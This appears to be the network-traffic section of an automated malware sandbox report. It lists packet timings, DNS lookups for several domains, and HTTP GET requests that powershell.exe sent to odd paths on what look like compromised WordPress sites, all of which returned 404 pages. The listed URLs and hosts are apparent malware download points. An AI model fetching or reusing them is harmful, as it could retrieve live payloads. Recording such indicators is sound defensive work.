                                              Jan 7, 2021 11:47:32.459527969 CET4434916858.97.195.135192.168.2.22
                                              Jan 7, 2021 11:47:32.459537029 CET4434916858.97.195.135192.168.2.22
                                              Jan 7, 2021 11:47:32.459728003 CET49168443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:32.489032984 CET49168443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:32.489552975 CET49169443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:32.728533030 CET4434916958.97.195.135192.168.2.22
                                              Jan 7, 2021 11:47:32.728635073 CET49169443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:32.729115009 CET49169443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:32.965648890 CET4434916858.97.195.135192.168.2.22
                                              Jan 7, 2021 11:47:32.965740919 CET49168443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:32.967442989 CET4434916958.97.195.135192.168.2.22
                                              Jan 7, 2021 11:47:32.967472076 CET4434916958.97.195.135192.168.2.22
                                              Jan 7, 2021 11:47:33.133694887 CET49168443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:33.242974997 CET49169443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:33.701493025 CET4434916858.97.195.135192.168.2.22
                                              Jan 7, 2021 11:47:33.701587915 CET49168443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:34.335038900 CET49168443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:34.653718948 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:47:34.654067993 CET4916780192.168.2.2270.32.23.58
                                              Jan 7, 2021 11:47:35.140860081 CET4434916858.97.195.135192.168.2.22
                                              Jan 7, 2021 11:47:35.141032934 CET49168443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:36.737791061 CET49168443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:38.089169025 CET4434916858.97.195.135192.168.2.22
                                              Jan 7, 2021 11:47:38.089262962 CET49168443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:41.543003082 CET49168443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:42.223583937 CET804916566.85.46.76192.168.2.22
                                              Jan 7, 2021 11:47:43.909363985 CET4434916858.97.195.135192.168.2.22
                                              Jan 7, 2021 11:47:43.909580946 CET49168443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:51.153222084 CET49168443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:47:55.429168940 CET4434916858.97.195.135192.168.2.22
                                              Jan 7, 2021 11:47:55.429406881 CET49168443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:48:02.085269928 CET4434916958.97.195.135192.168.2.22
                                              Jan 7, 2021 11:48:02.085700989 CET49169443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:48:02.089286089 CET49169443192.168.2.2258.97.195.135
                                              Jan 7, 2021 11:48:02.192666054 CET49170443192.168.2.2235.214.169.246
                                              Jan 7, 2021 11:48:02.245681047 CET4434917035.214.169.246192.168.2.22
                                              Jan 7, 2021 11:48:02.245809078 CET49170443192.168.2.2235.214.169.246
                                              Jan 7, 2021 11:48:02.246941090 CET49170443192.168.2.2235.214.169.246
                                              Jan 7, 2021 11:48:02.299884081 CET4434917035.214.169.246192.168.2.22
                                              Jan 7, 2021 11:48:02.300060034 CET4434917035.214.169.246192.168.2.22
                                              Jan 7, 2021 11:48:02.300092936 CET4434917035.214.169.246192.168.2.22
                                              Jan 7, 2021 11:48:02.300175905 CET49170443192.168.2.2235.214.169.246
                                              Jan 7, 2021 11:48:02.302309990 CET49170443192.168.2.2235.214.169.246
                                              Jan 7, 2021 11:48:02.303016901 CET49171443192.168.2.2235.214.169.246
                                              Jan 7, 2021 11:48:02.328140020 CET4434916958.97.195.135192.168.2.22
                                              Jan 7, 2021 11:48:02.355345964 CET4434917035.214.169.246192.168.2.22
                                              Jan 7, 2021 11:48:02.355967999 CET4434917135.214.169.246192.168.2.22
                                              Jan 7, 2021 11:48:02.356057882 CET49171443192.168.2.2235.214.169.246
                                              Jan 7, 2021 11:48:02.356523991 CET49171443192.168.2.2235.214.169.246
                                              Jan 7, 2021 11:48:02.409719944 CET4434917135.214.169.246192.168.2.22
                                              Jan 7, 2021 11:48:02.409765959 CET4434917135.214.169.246192.168.2.22
                                              Jan 7, 2021 11:48:02.409813881 CET4434917135.214.169.246192.168.2.22
                                              Jan 7, 2021 11:48:02.409943104 CET49171443192.168.2.2235.214.169.246
                                              Jan 7, 2021 11:48:02.411711931 CET49171443192.168.2.2235.214.169.246
                                              Jan 7, 2021 11:48:02.464648008 CET4434917135.214.169.246192.168.2.22
                                              Jan 7, 2021 11:48:02.779172897 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:02.982613087 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:02.982841015 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:02.983000040 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:03.185878992 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:04.653371096 CET804916770.32.23.58192.168.2.22
                                              Jan 7, 2021 11:48:05.069173098 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.069231987 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.069273949 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.069402933 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.069453001 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.069499016 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.069529057 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.069533110 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:05.069559097 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.069598913 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.069601059 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:05.069643021 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.069674969 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:05.069690943 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:05.272717953 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.272751093 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.272862911 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.272902966 CET4917280192.168.2.22103.8.25.63
                                              Jan 7, 2021 11:48:05.272918940 CET8049172103.8.25.63192.168.2.22
                                              Jan 7, 2021 11:48:05.272984028 CET4917280192.168.2.22103.8.25.63
Jan 7, 2021 11:48:05.273067951 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.273144007 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.273220062 CET | 49172 | 80 | 192.168.2.22 | 103.8.25.63
Jan 7, 2021 11:48:05.273308039 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.273396969 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.273483992 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.273494005 CET | 49172 | 80 | 192.168.2.22 | 103.8.25.63
Jan 7, 2021 11:48:05.273637056 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.273727894 CET | 49172 | 80 | 192.168.2.22 | 103.8.25.63
Jan 7, 2021 11:48:05.273746967 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.273813963 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.273883104 CET | 49172 | 80 | 192.168.2.22 | 103.8.25.63
Jan 7, 2021 11:48:05.274009943 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.274065018 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.274158001 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.274203062 CET | 49172 | 80 | 192.168.2.22 | 103.8.25.63
Jan 7, 2021 11:48:05.274290085 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.274352074 CET | 49172 | 80 | 192.168.2.22 | 103.8.25.63
Jan 7, 2021 11:48:05.274405003 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.274553061 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.274620056 CET | 49172 | 80 | 192.168.2.22 | 103.8.25.63
Jan 7, 2021 11:48:05.274703979 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.274739027 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.274799109 CET | 49172 | 80 | 192.168.2.22 | 103.8.25.63
Jan 7, 2021 11:48:05.476958036 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.477060080 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.477107048 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.477154970 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.477206945 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.477288008 CET | 49172 | 80 | 192.168.2.22 | 103.8.25.63
Jan 7, 2021 11:48:05.477325916 CET | 49172 | 80 | 192.168.2.22 | 103.8.25.63
Jan 7, 2021 11:48:05.477339983 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.477427006 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.477507114 CET | 49172 | 80 | 192.168.2.22 | 103.8.25.63
Jan 7, 2021 11:48:05.477546930 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.477658987 CET | 49172 | 80 | 192.168.2.22 | 103.8.25.63
Jan 7, 2021 11:48:05.477693081 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.477737904 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.477792025 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.477811098 CET | 49172 | 80 | 192.168.2.22 | 103.8.25.63
Jan 7, 2021 11:48:05.477986097 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.478080034 CET | 49172 | 80 | 192.168.2.22 | 103.8.25.63
Jan 7, 2021 11:48:05.478157997 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.478208065 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.478276014 CET | 49172 | 80 | 192.168.2.22 | 103.8.25.63
Jan 7, 2021 11:48:05.478333950 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.478444099 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.478519917 CET | 49172 | 80 | 192.168.2.22 | 103.8.25.63
Jan 7, 2021 11:48:05.478528023 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.478627920 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.478705883 CET | 49172 | 80 | 192.168.2.22 | 103.8.25.63
Jan 7, 2021 11:48:05.478797913 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.478846073 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.478909969 CET | 49172 | 80 | 192.168.2.22 | 103.8.25.63
Jan 7, 2021 11:48:05.478982925 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.479012012 CET | 80 | 49172 | 103.8.25.63 | 192.168.2.22
Jan 7, 2021 11:48:05.479077101 CET | 49172 | 80 | 192.168.2.22 | 103.8.25.63
Jan 7, 2021 11:48:05.664499998 CET | 49173 | 443 | 192.168.2.22 | 35.209.78.196
Jan 7, 2021 11:48:05.824990034 CET | 443 | 49173 | 35.209.78.196 | 192.168.2.22
Jan 7, 2021 11:48:05.825227022 CET | 49173 | 443 | 192.168.2.22 | 35.209.78.196
Jan 7, 2021 11:48:05.825822115 CET | 49173 | 443 | 192.168.2.22 | 35.209.78.196
Jan 7, 2021 11:48:05.985975981 CET | 443 | 49173 | 35.209.78.196 | 192.168.2.22
Jan 7, 2021 11:48:05.986038923 CET | 443 | 49173 | 35.209.78.196 | 192.168.2.22
Jan 7, 2021 11:48:05.986054897 CET | 443 | 49173 | 35.209.78.196 | 192.168.2.22
Jan 7, 2021 11:48:05.986419916 CET | 49173 | 443 | 192.168.2.22 | 35.209.78.196
Jan 7, 2021 11:48:05.989830017 CET | 49173 | 443 | 192.168.2.22 | 35.209.78.196
Jan 7, 2021 11:48:05.991049051 CET | 49174 | 443 | 192.168.2.22 | 35.209.78.196
Jan 7, 2021 11:48:06.142611027 CET | 443 | 49174 | 35.209.78.196 | 192.168.2.22
Jan 7, 2021 11:48:06.142874002 CET | 49174 | 443 | 192.168.2.22 | 35.209.78.196
Jan 7, 2021 11:48:06.143543005 CET | 49174 | 443 | 192.168.2.22 | 35.209.78.196
Jan 7, 2021 11:48:06.149971962 CET | 443 | 49173 | 35.209.78.196 | 192.168.2.22
Jan 7, 2021 11:48:06.295026064 CET | 443 | 49174 | 35.209.78.196 | 192.168.2.22
Jan 7, 2021 11:48:06.295073986 CET | 443 | 49174 | 35.209.78.196 | 192.168.2.22
Jan 7, 2021 11:48:06.295101881 CET | 443 | 49174 | 35.209.78.196 | 192.168.2.22
Jan 7, 2021 11:48:06.295247078 CET | 49174 | 443 | 192.168.2.22 | 35.209.78.196
Jan 7, 2021 11:48:06.298587084 CET | 49174 | 443 | 192.168.2.22 | 35.209.78.196
Jan 7, 2021 11:48:06.338192940 CET | 49172 | 80 | 192.168.2.22 | 103.8.25.63
Jan 7, 2021 11:48:06.449853897 CET | 443 | 49174 | 35.209.78.196 | 192.168.2.22
Jan 7, 2021 11:48:10.358536959 CET | 49168 | 443 | 192.168.2.22 | 58.97.195.135

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 7, 2021 11:47:05.572349072 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Jan 7, 2021 11:47:05.794960022 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Jan 7, 2021 11:47:07.393898010 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Jan 7, 2021 11:47:08.405873060 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Jan 7, 2021 11:47:08.775882959 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Jan 7, 2021 11:47:08.799792051 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Jan 7, 2021 11:47:29.824919939 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Jan 7, 2021 11:47:29.988394976 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Jan 7, 2021 11:47:31.815952063 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8
Jan 7, 2021 11:47:31.966275930 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22
Jan 7, 2021 11:48:02.117172956 CET | 49548 | 53 | 192.168.2.22 | 8.8.8.8
Jan 7, 2021 11:48:02.191674948 CET | 53 | 49548 | 8.8.8.8 | 192.168.2.22
Jan 7, 2021 11:48:02.419569016 CET | 55627 | 53 | 192.168.2.22 | 8.8.8.8
Jan 7, 2021 11:48:02.777923107 CET | 53 | 55627 | 8.8.8.8 | 192.168.2.22
Jan 7, 2021 11:48:05.491617918 CET | 56009 | 53 | 192.168.2.22 | 8.8.8.8
Jan 7, 2021 11:48:05.663836956 CET | 53 | 56009 | 8.8.8.8 | 192.168.2.22

ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Jan 7, 2021 11:47:08.799891949 CET | 192.168.2.22 | 8.8.8.8 | d010 | (Port unreachable) | Destination Unreachable
Jan 7, 2021 11:47:32.773394108 CET | 58.97.195.135 | 192.168.2.22 | bdc0 | (Host unreachable) | Destination Unreachable
Jan 7, 2021 11:47:32.773433924 CET | 58.97.195.135 | 192.168.2.22 | bdc0 | (Host unreachable) | Destination Unreachable
Jan 7, 2021 11:47:38.088825941 CET | 58.97.195.135 | 192.168.2.22 | bdc0 | (Host unreachable) | Destination Unreachable
Jan 7, 2021 11:47:38.088840961 CET | 58.97.195.135 | 192.168.2.22 | bdcc | (Host unreachable) | Destination Unreachable
Jan 7, 2021 11:47:39.372826099 CET | 58.97.195.135 | 192.168.2.22 | bdcc | (Host unreachable) | Destination Unreachable
Jan 7, 2021 11:47:42.622669935 CET | 58.97.195.135 | 192.168.2.22 | bdc0 | (Host unreachable) | Destination Unreachable
Jan 7, 2021 11:47:58.632180929 CET | 58.97.195.135 | 192.168.2.22 | bdcc | (Host unreachable) | Destination Unreachable
Jan 7, 2021 11:48:13.482003927 CET | 58.97.195.135 | 192.168.2.22 | bdc0 | (Host unreachable) | Destination Unreachable

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 7, 2021 11:47:05.572349072 CET | 192.168.2.22 | 8.8.8.8 | 0x71dd | Standard query (0) | wheelcomoving.com | A (IP address) | IN (0x0001)
Jan 7, 2021 11:47:07.393898010 CET | 192.168.2.22 | 8.8.8.8 | 0x8b68 | Standard query (0) | 00zyku.com | A (IP address) | IN (0x0001)
Jan 7, 2021 11:47:08.405873060 CET | 192.168.2.22 | 8.8.8.8 | 0x8b68 | Standard query (0) | 00zyku.com | A (IP address) | IN (0x0001)
Jan 7, 2021 11:47:29.824919939 CET | 192.168.2.22 | 8.8.8.8 | 0xc229 | Standard query (0) | ketoresetme.com | A (IP address) | IN (0x0001)
Jan 7, 2021 11:47:31.815952063 CET | 192.168.2.22 | 8.8.8.8 | 0xc6cc | Standard query (0) | rycomputer.com | A (IP address) | IN (0x0001)
Jan 7, 2021 11:48:02.117172956 CET | 192.168.2.22 | 8.8.8.8 | 0xd92d | Standard query (0) | d-cem.com | A (IP address) | IN (0x0001)
Jan 7, 2021 11:48:02.419569016 CET | 192.168.2.22 | 8.8.8.8 | 0x62a5 | Standard query (0) | thebestfikrah.com | A (IP address) | IN (0x0001)
Jan 7, 2021 11:48:05.491617918 CET | 192.168.2.22 | 8.8.8.8 | 0x194a | Standard query (0) | phawayagency.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 7, 2021 11:47:05.794960022 CET | 8.8.8.8 | 192.168.2.22 | 0x71dd | No error (0) | wheelcomoving.com | | 66.85.46.76 | A (IP address) | IN (0x0001)
Jan 7, 2021 11:47:08.775882959 CET | 8.8.8.8 | 192.168.2.22 | 0x8b68 | No error (0) | 00zyku.com | | 193.187.117.26 | A (IP address) | IN (0x0001)
Jan 7, 2021 11:47:08.799792051 CET | 8.8.8.8 | 192.168.2.22 | 0x8b68 | No error (0) | 00zyku.com | | 193.187.117.26 | A (IP address) | IN (0x0001)
Jan 7, 2021 11:47:29.988394976 CET | 8.8.8.8 | 192.168.2.22 | 0xc229 | No error (0) | ketoresetme.com | | 70.32.23.58 | A (IP address) | IN (0x0001)
Jan 7, 2021 11:47:31.966275930 CET | 8.8.8.8 | 192.168.2.22 | 0xc6cc | No error (0) | rycomputer.com | | 58.97.195.135 | A (IP address) | IN (0x0001)
Jan 7, 2021 11:48:02.191674948 CET | 8.8.8.8 | 192.168.2.22 | 0xd92d | No error (0) | d-cem.com | | 35.214.169.246 | A (IP address) | IN (0x0001)
Jan 7, 2021 11:48:02.777923107 CET | 8.8.8.8 | 192.168.2.22 | 0x62a5 | No error (0) | thebestfikrah.com | | 103.8.25.63 | A (IP address) | IN (0x0001)
Jan 7, 2021 11:48:05.663836956 CET | 8.8.8.8 | 192.168.2.22 | 0x194a | No error (0) | phawayagency.com | | 35.209.78.196 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• wheelcomoving.com
• ketoresetme.com
• thebestfikrah.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 66.85.46.76 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
Jan 7, 2021 11:47:05.965092897 CET | 0 | OUT | GET /p/RuMeRPa/ HTTP/1.1
Host: wheelcomoving.com
Connection: Keep-Alive
Jan 7, 2021 11:47:07.069713116 CET | 1 | IN | HTTP/1.1 404 Not Found
Date: Thu, 07 Jan 2021 10:47:06 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://wheelcomoving.com/wp-json/>; rel="https://api.w.org/"
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Data Raw: 31 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 0d 0a
Data Ascii: 17<!DOCTYPE html><html
Jan 7, 2021 11:47:07.069770098 CET | 1 | IN | Data Raw: 31 62 0d 0a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 0d 0a 09 0d 0a 31 37 38 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 68 65 65
Data Ascii: 1blang="en-US"><head>178<link rel="shortcut icon" href="https://wheelcomoving.com/wp-content/uploads/2015/12/Transportation-16x16-1.png" type="image/x-icon"><meta charset="UTF-8"><meta name="viewport" content="width=device-wi
Jan 7, 2021 11:47:07.069837093 CET | 1 | IN | Data Raw: 33 36 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 68 65 65 6c 20 43 6f 20 4d 6f 76 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 0d 0a
Data Ascii: 36<title>Page not found &#8211; Wheel Co Moving</title>
Jan 7, 2021 11:47:07.072895050 CET | 1 | IN | Data Raw: 33 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 0d 0a 32 64 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73
Data Ascii: 3a<link rel='dns-prefetch' href='//fonts.googleapis.com' />2d<link rel='dns-prefetch' href='//s.w.org' />
Jan 7, 2021 11:47:07.072925091 CET | 1 | IN | Data Raw: 38 30 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 68 65 65 6c 20 43 6f 20 4d 6f 76 69 6e 67 20 26 72 61 71 75 6f
Data Ascii: 80<link rel="alternate" type="application/rss+xml" title="Wheel Co Moving &raquo; Feed" href="https://wheelcomoving.com/feed/" />
Jan 7, 2021 11:47:07.073151112 CET | 2 | IN | Data Raw: 39 32 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 68 65 65 6c 20 43 6f 20 4d 6f 76 69 6e 67 20 26 72 61 71 75 6f
Data Ascii: 92<link rel="alternate" type="application/rss+xml" title="Wheel Co Moving &raquo; Comments Feed" href="https://wheelcomoving.com/comments/feed/" />
Jan 7, 2021 11:47:07.073260069 CET | 3 | IN | Data Raw: 33 66 0d 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 09 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 0d 0a 38 34 31 0d 0a 7b 22 62 61 73 65 55 72
Data Ascii: 3f<script type="text/javascript">window._wpemojiSettings = 841{"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.1\/svg\/","svgExt":".svg","sourc
Jan 7, 2021 11:47:07.073304892 CET | 4 | IN | Data Raw: 6f 72 28 69 3d 41 72 72 61 79 28 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 29 2c 74 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 6f 3d 30 3b
Data Ascii: or(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.
Jan 7, 2021 11:47:07.073339939 CET | 4 | IN | Data Raw: 31 33 63 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 0a 69 6d 67 2e 65 6d 6f 6a 69 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 20 21 69 6d 70 6f 72 74 61 6e
Data Ascii: 13c<style type="text/css">img.wp-smiley,img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 .07em !important;vertical-align: -0.1em
Jan 7, 2021 11:47:07.073368073 CET | 5 | IN | Data Raw: 61 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 68 65 65 6c 63 6f 6d 6f 76 69 6e 67 2e 63
Data Ascii: aa<link rel='stylesheet' id='wp-block-library-css' href='http://wheelcomoving.com/wp-includes/css/dist/block-library/style.min.css?ver=5.6' type='text/css' media='all' />
Jan 7, 2021 11:47:07.219362974 CET | 6 | IN | Data Raw: 61 38 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 62 74 5f 63 63 5f 73 74 79 6c 65 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 68 65 65 6c 63 6f 6d 6f 76 69 6e 67 2e 63 6f 6d 2f 77 70
Data Ascii: a8<link rel='stylesheet' id='bt_cc_style-css' href='http://wheelcomoving.com/wp-content/plugins/bt_cost_calculator/style.min.css?ver=5.6' type='text/css' media='all' />b3<link rel='stylesheet' id='contact-form-7-css' href='http://whee


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49167 | 70.32.23.58 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
Jan 7, 2021 11:47:30.139081001 CET | 52 | OUT | GET /wp-content/pmJ/ HTTP/1.1
Host: ketoresetme.com
Connection: Keep-Alive
Jan 7, 2021 11:47:31.352452040 CET | 53 | IN | HTTP/1.1 404 Not Found
Date: Thu, 07 Jan 2021 10:47:30 GMT
Server: Apache
X-Powered-By: PHP/7.3.25
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://ketoresetme.com/wp-json/>; rel="https://api.w.org/"
Strict-Transport-Security: max-age=63072000; includeSubDomains
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Vary: Accept-Encoding
Keep-Alive: timeout=3, max=500
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
